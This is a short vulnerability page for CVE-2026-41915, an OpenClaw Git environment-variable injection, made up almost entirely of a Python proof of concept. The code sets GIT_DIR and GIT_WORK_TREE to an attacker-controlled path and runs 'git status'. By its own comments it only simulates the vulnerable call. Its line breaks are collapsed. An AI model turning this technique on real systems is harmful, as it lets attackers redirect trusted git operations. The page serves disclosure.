CVE-2026-41915：OpenClaw Git环境变量注入漏洞

import os import subprocess # PoC for CVE-2026-41915: OpenClaw Git Environment Variable Injection # 1. Define the malicious GIT_DIR environment variable # This forces git to look for a repository in an attacker-controlled location # or a sensitive directory the attacker wishes to interact with. malicious_git_dir = "/tmp/attacker_controlled_repo" os.environ['GIT_DIR'] = malicious_git_dir # 2. (Optional) Set other git variables to further control execution os.environ['GIT_WORK_TREE'] = '/tmp/attacker_controlled_repo' print(f"[*] Setting GIT_DIR to: {malicious_git_dir}") # 3. Trigger the vulnerable OpenClaw operation # In a real scenario, this would be a specific OpenClaw command that invokes git. # For demonstration, we simulate the internal git call that OpenClaw makes. # If OpenClaw runs `git status` or `git pull`, it will use the malicious env vars. try: # Simulating: openclaw --update (which internally runs git commands) # We directly call git to show the effect of the environment variable injection. print("[*] Triggering a git command within the modified environment...") # This command would normally operate on the legitimate repo, # but due to the exploit, it uses /tmp/attacker_controlled_repo result = subprocess.run(['git', 'status'], capture_output=True, text=True) if "fatal" not in result.stderr: print("[!] Exploit successful: Git operation redirected to attacker directory.") print(result.stdout) else: print("[*] Git failed (expected if directory doesn't exist), but env var was processed.") print(result.stderr) except Exception as e: print(f"Error: {e}")